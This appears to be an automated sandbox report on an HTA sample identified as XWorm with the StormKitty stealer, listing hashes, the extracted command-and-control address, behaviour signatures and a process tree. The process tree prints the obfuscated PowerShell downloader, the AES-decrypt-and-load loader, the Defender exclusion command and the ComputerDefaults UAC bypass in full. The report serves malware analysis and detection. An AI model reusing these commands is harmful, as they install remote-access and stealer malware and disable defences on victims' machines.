Analysis
-
max time kernel
134s -
max time network
134s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
30/05/2024, 13:18
Static task
static1
Behavioral task
behavioral1
Sample
mine.hta
Resource
win7-20240508-en
General
-
Target
mine.hta
-
Size
48KB
-
MD5
8ec81411709c0d3ca73859814204cd71
-
SHA1
7da6542e29c888d65a857cf5876ed8e9e6524510
-
SHA256
6840b6d84f7c7190424fd465e466e2477e7c8a781457e2c6dcd523df498cea3d
-
SHA512
ece006bb69841cf02d64c95c0534376934fa073b89eab8f85cc3323f647f1a326198d56cad9666d5b6152e763e2859e945e8794a877c75808f224b27201eec14
-
SSDEEP
768:SOLDbrv8XXl7qCk0BU6zoWvXqfM0JYJ4Tpdsfq0H5wj/:SObstqCdoWvXqfM0JY40Kj
Malware Config
Extracted
xworm
5.0
127.0.0.1:7001
134.255.233.93:7001
5loUYH5mEGReJgAG
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/2908-89-0x000000000AC30000-0x000000000AC40000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/2908-94-0x0000000007D20000-0x0000000007E3E000-memory.dmp family_stormkitty -
Blocklisted process makes network request 2 IoCs
flow pid Process 16 2848 powershell.exe 39 2908 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2908 powershell.exe 2648 powershell.exe 2848 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation ComputerDefaults.exe -
Executes dropped EXE 1 IoCs
pid Process 2668 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
pid Process 2668 ComputerDefaults.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4360 2908 WerFault.exe 104 -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2848 powershell.exe 2848 powershell.exe 2908 powershell.exe 2908 powershell.exe 2908 powershell.exe 2648 powershell.exe 2648 powershell.exe 2648 powershell.exe 2908 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 2648 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2908 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1580 wrote to memory of 2848 1580 mshta.exe 90 PID 1580 wrote to memory of 2848 1580 mshta.exe 90 PID 1580 wrote to memory of 2848 1580 mshta.exe 90 PID 2848 wrote to memory of 964 2848 powershell.exe 95 PID 2848 wrote to memory of 964 2848 powershell.exe 95 PID 2848 wrote to memory of 964 2848 powershell.exe 95 PID 964 wrote to memory of 1592 964 cmd.exe 99 PID 964 wrote to memory of 1592 964 cmd.exe 99 PID 964 wrote to memory of 1592 964 cmd.exe 99 PID 964 wrote to memory of 3648 964 cmd.exe 103 PID 964 wrote to memory of 3648 964 cmd.exe 103 PID 964 wrote to memory of 3648 964 cmd.exe 103 PID 964 wrote to memory of 2908 964 cmd.exe 104 PID 964 wrote to memory of 2908 964 cmd.exe 104 PID 964 wrote to memory of 2908 964 cmd.exe 104 PID 2908 wrote to memory of 2648 2908 powershell.exe 108 PID 2908 wrote to memory of 2648 2908 powershell.exe 108 PID 2908 wrote to memory of 2648 2908 powershell.exe 108 PID 2908 wrote to memory of 3616 2908 powershell.exe 111 PID 2908 wrote to memory of 3616 2908 powershell.exe 111 PID 2908 wrote to memory of 3616 2908 powershell.exe 111 PID 3616 wrote to memory of 2668 3616 cmd.exe 113 PID 3616 wrote to memory of 2668 3616 cmd.exe 113 PID 3616 wrote to memory of 2668 3616 cmd.exe 113 PID 2908 wrote to memory of 3148 2908 powershell.exe 120 PID 2908 wrote to memory of 3148 2908 powershell.exe 120 PID 2908 wrote to memory of 3148 2908 powershell.exe 120
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mine.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function pYUxYe($YX, $ed){[IO.File]::WriteAllBytes($YX, $ed)};function eYJrvvozw($YX){if($YX.EndsWith((atHcQU @(22670,22724,22732,22732))) -eq $True){Start-Process (atHcQU @(22738,22741,22734,22724,22732,22732,22675,22674,22670,22725,22744,22725)) $YX}else{Start-Process $YX}};function QJVAx($F){$J = New-Object (atHcQU @(22702,22725,22740,22670,22711,22725,22722,22691,22732,22729,22725,22734,22740));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$ed = $J.DownloadData($F);return $ed};function atHcQU($Z){$h=22624;$OK=$Null;foreach($Pw in $Z){$OK+=[char]($Pw-$h)};return $OK};function ROmYsTcn(){$nmYSjx = $env:APPDATA + '\';$JkqUaMTnM = QJVAx (atHcQU @(22728,22740,22740,22736,22739,22682,22671,22671,22743,22721,22732,22732,22677,22740,22727,22728,22726,22678,22726,22724,22727,22670,22721,22736,22729,22670,22735,22736,22725,22734,22739,22735,22741,22738,22723,22725,22739,22721,22721,22739,22670,22735,22738,22727,22671,22714,22703,22724,22723,22726,22702,22741,22735,22671,22733,22745,22744,22743,22738,22677,22723,22732,22729,22670,22722,22721,22740));$lVBjIvqD = $nmYSjx + 'myxwr5cli.bat';pYUxYe $lVBjIvqD $JkqUaMTnM;eYJrvvozw $lVBjIvqD;;;;}ROmYsTcn;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\myxwr5cli.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\cmd.execmd /c "set __=^&rem"4⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP+qKNutTynKUkrEYUHXrfgFt+qGd2k9eoIQyTxHELs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w4Vmy/houRSXsK7A9z6kzA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lvUHo=New-Object System.IO.MemoryStream(,$param_var); $UxGoq=New-Object System.IO.MemoryStream; $NiPKr=New-Object System.IO.Compression.GZipStream($lvUHo, [IO.Compression.CompressionMode]::Decompress); $NiPKr.CopyTo($UxGoq); $NiPKr.Dispose(); $lvUHo.Dispose(); $UxGoq.Dispose(); $UxGoq.ToArray();}function execute_function($param_var,$param2_var){ $KkPkD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zNDLa=$KkPkD.EntryPoint; $zNDLa.Invoke($null, $param2_var);}$XLuZt = 'C:\Users\Admin\AppData\Roaming\myxwr5cli.bat';$host.UI.RawUI.WindowTitle = $XLuZt;$fEYHc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XLuZt).Split([Environment]::NewLine);foreach ($OYqiR in $fEYHc) { if ($OYqiR.StartsWith('yCOdwoiwmunBFrPLojaG')) { $RNNcG=$OYqiR.Substring(20); break; }}$payloads_var=[string[]]$RNNcG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵PID:3648
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:2668
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q5⤵PID:3148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 11685⤵
- Program crash
PID:4360
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4420,i,5047420736443372512,9747851268033796534,262144 --variations-seed-version --mojo-platform-channel-handle=4172 /prefetch:81⤵PID:2804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2908 -ip 29081⤵PID:2688
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
17KB
MD5b600c0d019dc3eb6c9f4f77b97885c62
SHA1e272f8e32a340b5e7f656ca6aef1dfe9c0bddd07
SHA256d6642f4493c58702ad1cd8fe6f1c3f98ac79f61184934ed931b6fd57da676d55
SHA5124fb087f63a68d064041ace9e5fa88e49e3f00bec4e96dc97a115a35c767582ca523bc6668a4dba3e9150ce6dfdf1751fe0083fce922a712f09b9547ce00556b4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
379KB
MD503c6c2175f84ad54c989f0608d3cbb57
SHA19846d7aa4c639d038f428977dfe0eef7db8ac009
SHA2566d04562cf9d1e0ee7b7c77af40e1e3299b6eba9375f35978d9776d94a9dae3d7
SHA51245bc9713a632904216f5bfd3e5648542382bc5c3aa8fa5253eea9f04d6592ac0aabcffc02451261210835f4f4d57c1f4895b7d02be24dd5edffbdc5e5b5e13c8
-
Filesize
66KB
MD5cfa65b13918526579371c138108a7ddb
SHA128bc560c542c405e08001f95c4ea0511e5211035
SHA2564c70fea1c4f9b78955eb840c11c6c81f1d860485e090526a8e8176d98b1be3d6
SHA5127ad417e862c38f1032b300735c00050435f0dd1d816e93b9a466adf3bc092be770ebf59c1617db2281c7cf982a75e6c93d927d5784132aa2c6292f3e950eca88
-
Filesize
122KB
MD5e286ada1af4b08fa4b7c78f862883c4e
SHA1798ebc7b7cd3db667f1a59ade299be4cff397f39
SHA25616eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3
SHA512fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5